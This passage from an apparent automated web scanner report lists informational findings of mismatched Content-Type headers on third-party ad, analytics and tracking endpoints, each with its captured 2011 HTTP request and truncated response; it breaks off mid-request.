Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; JSESSIONID=zpTQTmGZGnNpymfH3xRhbBt6pV2p0CL18mPmWLJZMppwSvD6vnTh!726905356; BIGipServermktap-myprofile-endusr_http_pool=218993293.26910.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:09:35 GMT
Accept-Ranges: bytes
Last-Modified: Fri, 18 Mar 2011 13:50:52 GMT
Content-Type: text/html
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=300+0;age=242;ecid=30186729237082835,0)
Content-Length: 4274

/* Used to attach and remove error message which are not set or removed on
* server side validators.
*/
function checkOnLoad()
{
var inputs = document.getElementsByTagName('input');
var spans =
...[SNIP]...

31.64. http://netsuite-www.baynote.net/baynote/tags2/guide/results-products/netsuite-www

Summary

Severity:   Information
Confidence:   Firm
Host:   http://netsuite-www.baynote.net
Path:   /baynote/tags2/guide/results-products/netsuite-www

Issue detail

The response contains the following Content-type statement: text/javascript;charset=ISO-8859-1. The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /baynote/tags2/guide/results-products/netsuite-www?userId=6923713758307492964&customerId=netsuite&code=www&id=0&guide=ContentGuide&resultsPerPage=5&referrer=http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fhome.shtml&url=http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fproducts%2Fnetsuite%2Ffinancials%2Fmain.shtml&appendParams=&rankParam=&condition=d%26g%26s&v=1 HTTP/1.1
Host: netsuite-www.baynote.net
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/products/netsuite/financials/main.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: BNServer
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:44:15 GMT
Content-Length: 3780


bnTagManager.getTag(0).results = "<div class='bn_g_container' id='bn_guidecontainer0'><div class='bn_g_area' id='bn_guidearea0'><div class='bn_g_welcome' id='bn_guidewelcome0
...[SNIP]...

31.65. http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard

Summary

Severity:   Information
Confidence:   Firm
Host:   http://netsuite.tt.omtrdc.net
Path:   /m2/netsuite/mbox/standard

Issue detail

The response contains the following Content-type statement: text/javascript. The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /m2/netsuite/mbox/standard?mboxHost=www.netsuite.com&mboxSession=1315341135013-154927&mboxPage=1315341135013-154927&screenHeight=1200&screenWidth=1920&browserWidth=1266&browserHeight=909&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=me-ecomm-form-test&mboxId=0&mboxTime=1315323135041&mboxURL=http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fseo-landing-page%2Fecommerce%2Fecommerce-2.html%3Fgclid%3DCMyov8D4iKsCFSBCgwodRnXLzA&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG%2Be-commerce%2Bsolutio&mboxVersion=40 HTTP/1.1
Host: netsuite.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/seo-landing-page/ecommerce/ecommerce-2.html?gclid=CMyov8D4iKsCFSBCgwodRnXLzA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1315341135013-154927.19; Domain=netsuite.tt.omtrdc.net; Expires=Tue, 20-Sep-2011 15:32:28 GMT; Path=/m2/netsuite
Content-Type: text/javascript
Content-Length: 173
Date: Tue, 06 Sep 2011 15:32:27 GMT
Server: Test & Target

mboxFactories.get('default').get('me-ecomm-form-test',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315341135013-154927.19");

31.66. http://now.eloqua.com/visitor/v200/svrGP.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Issue detail

The response contains the following Content-type statement: text/html. The response states that it contains HTML. However, it actually appears to contain a GIF image.

Request

GET /visitor/v200/svrGP.aspx?pps=3&siteid=2429&ref2=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG+e-commerce+solutio&tzo=360&ms=530 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
Referer: http://www.tenzing.com/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ELOQUA=GUID=F788D26BA3284C76A75E75F5D13F522A; ELQSTATUS=OK

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Tue, 06 Sep 2011 15:32:10 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;

31.67. https://oracleus.wingateweb.com/portal/dwr/interface/PortalAjax.js

Summary

Severity:   Information
Confidence:   Firm
Host:   https://oracleus.wingateweb.com
Path:   /portal/dwr/interface/PortalAjax.js

Issue detail

The response contains the following Content-type statement: text/plain; charset=UTF-8. The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /portal/dwr/interface/PortalAjax.js HTTP/1.1
Host: oracleus.wingateweb.com
Connection: keep-alive
Referer: https://oracleus.wingateweb.com/portal/newreg.ww?brand=jone&eve=ow&wt=ow
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=abcrj6SogYwvr-3-LC-it

Response

HTTP/1.1 200 OK
Server: Resin/3.1.8
Content-Type: text/plain; charset=UTF-8
Date: Tue, 06 Sep 2011 15:54:15 GMT
Content-Length: 1726


// Provide a default path to dwr.engine
if (dwr == null) var dwr = {};
if (dwr.engine == null) dwr.engine = {};
if (DWREngine == null) var DWREngine = dwr.engine;

if (PortalAjax == null) var PortalA
...[SNIP]...

31.68. http://ping.crowdscience.com/ping.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ping.crowdscience.com
Path:   /ping.js

Issue detail

The response contains the following Content-type statement: text/plain. The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /ping.js?url=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php&id=5c5c650d27&u=mozilla%2F5.0%20(windows%20nt%206.1%3B%20wow64)%20applewebkit%2F535.1%20(khtml%2C%20like%20gecko)%20chrome%2F13.0.782.220%20safari%2F535.1&x=1315341159227&c=0&t=0&v=0&m=0&vn=2.0.4 HTTP/1.1
Host: ping.crowdscience.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __csadt_="NSBE647001:|fixed_placement||52487714041||0||1||1"; __csv=2a31db5320bf2a6b

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:56 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2
Set-Cookie: __csv=2a31db5320bf2a6b; Domain=.crowdscience.com; expires=Mon, 05 Dec 2011 15:32:56; Path=/
Content-Length: 8286
P3P: CP="NOI DSP COR NID DEVa PSAi OUR STP OTC",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain


(function (){

var cs = CrowdScience;

cs.state = 1; // cs.states.ping_loading;

cs.invitation_beforeShow = function() {};
cs.invitation_afterShow = function() {};

cs.i
...[SNIP]...

31.69. http://pixel.fetchback.com/serve/fb/pdc

Summary

Severity:   Information
Confidence:   Firm
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The response contains the following Content-type statement: text/html; charset=UTF-8. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /serve/fb/pdc?cat=&name=landing&sid=719 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/seo-landing-page/ecommerce/ecommerce-2.html?gclid=CMyov8D4iKsCFSBCgwodRnXLzA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:28 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=1_1315323148_1315323137705:2485910142863198; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: kwd=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sit=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cre=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bpd=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: apd=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: scg=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ppd=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: afl=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: act=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 06 Sep 2011 15:32:28 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40

<!-- opt out exists or ip filtered -->

31.70. https://register.cnbc.com/RandomImage.jsp

Summary

Severity:   Information
Confidence:   Firm
Host:   https://register.cnbc.com
Path:   /RandomImage.jsp

Issue detail

The response contains the following Content-type statement: text/html. The response states that it contains HTML. However, it actually appears to contain a JPEG image.

Request

GET /RandomImage.jsp HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339298449; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:40 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Cache-Control: pre-check=0, post-check=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/
Content-Length: 2261

......JFIF.............C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......2...."..............................
...[SNIP]...

31.71. http://rt.disqus.com/forums/realtime-cached.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://rt.disqus.com
Path:   /forums/realtime-cached.js

Issue detail

The response contains the following Content-type statement: application/x-javascript. The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /forums/realtime-cached.js?timestamp=2011-09-06_11:32:37&thread_id=188845576&f=readwriteenterprise&1315341172995 HTTP/1.1
Host: rt.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: disqus_unique=608614822849; __qca=P0-943627109-1315055753168; __utma=113869458.1840189074.1315055753.1315138435.1315341172.5; __utmb=113869458.1.10.1315341172; __utmc=113869458; __utmz=113869458.1315341172.5.5.utmcsr=readwriteweb.com|utmccn=(referral)|utmcmd=referral|utmcct=/enterprise/2010/11/oracle.php

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:33:08 GMT
Content-Type: application/x-javascript
Content-Length: 67
Last-Modified: Mon, 17 Jan 2011 19:57:15 GMT
Connection: close
Accept-Ranges: bytes

DISQUS.dtpl.actions.fire("realtime.update", "2010-12-08_19:48:43")

31.72. http://rt.legolas-media.com/lgrt

Summary

Severity:   Information
Confidence:   Firm
Host:   http://rt.legolas-media.com
Path:   /lgrt

Issue detail

The response contains the following Content-type statement: application/javascript. The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /lgrt?ci=2&ei=9&ti=28&pbi=37 HTTP/1.1
Host: rt.legolas-media.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ui=5ea31fa9-d42d-458f-9bb4-1700d69738c0; lgpr=//8=; lgtix=BgABADMBSQABADMBHAAEADUBDAABADMB/QABADABXwABADMB

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:55:10 GMT
Server: Apache
Expires: -1
Cache-Control: no-cache; no-store
Content-Type: application/javascript
Set-Cookie: lgtix=BgABADMBSQABADMBHAAGADUBDAABADMB/QABADABXwABADMB; path=/; expires=Fri, 05 Sep 2014 14:55:10 GMT; domain=.legolas-media.com
P3P: policyref="http://www.legolas-media.com/w3c/p3p.xml",CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Length: 5
Connection: close

true;

31.73. http://rww.readwriteweb.netdna-cdn.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://rww.readwriteweb.netdna-cdn.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement: text/plain. The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: rww.readwriteweb.netdna-cdn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.36
Date: Tue, 06 Sep 2011 15:33:13 GMT
Content-Type: text/plain
Connection: keep-alive
Last-Modified: Sun, 16 Dec 2007 08:22:21 GMT
ETag: "37e-44162fe9ac940"
Content-Length: 894

..............h.......(....... ..............................................................................................................................................&%.ff.pr.rs....ba..........
...[SNIP]...

31.74. http://s7.addthis.com/js/addthis_widget.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://s7.addthis.com
Path:   /js/addthis_widget.php

Issue detail

The response contains the following Content-type statement: text/plain; charset=UTF-8. The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /js/addthis_widget.php?v=12 HTTP/1.1
Host: s7.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/technetwork/community/developer-vm/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,70|36

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 25 Aug 2011 11:55:32 GMT
ETag: "f82260-bce7-4ab531b177500"
Accept-Ranges: bytes
Content-Length: 48359
Content-Type: text/plain; charset=UTF-8
Date: Tue, 06 Sep 2011 16:12:49 GMT
Connection: close
Vary: Accept-Encoding

/* (c) 2008, 2009, 2010 Add This, LLC */
var addthis_conf={ver:120};function addthis_to(a){return addthis_sendto(a)}function addthis_onmouseover(b,f,d,c,h,a,g){if(h){addthis_config.username=h}if(a){ad
...[SNIP]...

31.75. http://server.iad.liveperson.net/hcp/html/mTag.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://server.iad.liveperson.net
Path:   /hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement: application/x-javascript. The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=52793056 HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.tenzing.com/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678

Response

HTTP/1.1 200 OK
Content-Length: 17291
Content-Type: application/x-javascript
Content-Location: http://server.iad.liveperson.net/lpWeb/default_SMB//hcpv/emt/mtag.js?site=52793056
Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT
Accept-Ranges: bytes
ETag: "e0f243e4cde1cb1:1320"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:32:29 GMT

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

31.76. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies

Summary

Severity:   Information
Confidence:   Firm
Host:   http://snas.nbcuni.com
Path:   /snas/api/getRemoteDomainCookies

Issue detail

The response contains the following Content-type statement: text/html. The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: s_nr=1313446468300; s_vi=[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:28 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: JSESSIONID=96CD1AEC186AFFCEEE1A9069E6B37A5F; Path=/
Cache-Control: max-age=10
Expires: Tue, 06 Sep 2011 15:00:38 GMT
Content-Length: 167
Content-Type: text/html

__nbcsnasadops.doSCallback({ "cookie":{"s_nr":"1313446468300","JSESSIONID":"96CD1AEC186AFFCEEE1A9069E6B37A5F","s_vi":"[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]"}});

31.77. http://sophelle.app5.hubspot.com/salog.js.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sophelle.app5.hubspot.com
Path:   /salog.js.aspx

Issue detail

The response contains the following Content-type statement: text/html; charset=utf-8. The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /salog.js.aspx HTTP/1.1
Host: sophelle.app5.hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=tnXvN-SJzQEkAAAANDYwNWYxM2EtN2M2MC00YWU2LWFlZTctOTU1OTY4ZTNlZTI00; hubspotutk=9c6ca7a5-ca15-46b9-a6b6-0f57cca70bb6; hsfirstvisit=http%253A%252F%252Fwww.sophelle.com%252F%7c%7c2011-09-04%252010%253A55%253A54

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 575
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Tue, 06 Sep 2011 15:27:50 GMT
Set-Cookie: HUBSPOT159=219223212.0.0000; path=/


var hsUse20Servers = true;
var hsDayEndsIn = 45129;
var hsWeekEndsIn = 477129;
var hsMonthEndsIn = 2118729;
var hsAnalyticsServer = "tracking.hubspot.com";
var hsTimeStamp = "2011-09-06 11:27
...[SNIP]...

31.78. http://subplyevents.cloudapp.net/AddEvent.aspx/061BB857AFEC5D2E9B3ACD2683E66EA8B0CF3633/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null

Summary

Severity:   Information
Confidence:   Firm
Host:   http://subplyevents.cloudapp.net
Path:   /AddEvent.aspx/061BB857AFEC5D2E9B3ACD2683E66EA8B0CF3633/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null

Issue detail

The response contains the following Content-type statement: text/html; charset=utf-8. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /AddEvent.aspx/061BB857AFEC5D2E9B3ACD2683E66EA8B0CF3633/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null HTTP/1.1
Host: subplyevents.cloudapp.net
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=psptntif5pl0d3v1qhlvb2z3; path=/; HttpOnly
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:13:10 GMT
Content-Length: 101

Video Event: 061BB857AFEC5D2E9B3ACD2683E66EA8B0CF3633 - f979c890-22ec-412f-8e2c-df70d1568052 - oracle

31.79. http://subplyevents.cloudapp.net/AddEvent.aspx/0CE9D6956B7A0FCD1E99F1E8A802B1EDB8F1B59A/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null

Summary

Severity:   Information
Confidence:   Firm
Host:   http://subplyevents.cloudapp.net
Path:   /AddEvent.aspx/0CE9D6956B7A0FCD1E99F1E8A802B1EDB8F1B59A/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null

Issue detail

The response contains the following Content-type statement: text/html; charset=utf-8. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /AddEvent.aspx/0CE9D6956B7A0FCD1E99F1E8A802B1EDB8F1B59A/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null HTTP/1.1
Host: subplyevents.cloudapp.net
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=piy2pjshxmaa22dmacqth3bt

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:14:36 GMT
Content-Length: 101

Video Event: 0CE9D6956B7A0FCD1E99F1E8A802B1EDB8F1B59A - f979c890-22ec-412f-8e2c-df70d1568052 - oracle

31.80. http://subplyevents.cloudapp.net/AddEvent.aspx/1B862009340CE9937F3D91AB6CCA134E42777EEE/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null

Summary

Severity:   Information
Confidence:   Firm
Host:   http://subplyevents.cloudapp.net
Path:   /AddEvent.aspx/1B862009340CE9937F3D91AB6CCA134E42777EEE/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null

Issue detail

The response contains the following Content-type statement: text/html; charset=utf-8. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /AddEvent.aspx/1B862009340CE9937F3D91AB6CCA134E42777EEE/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null HTTP/1.1
Host: subplyevents.cloudapp.net
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
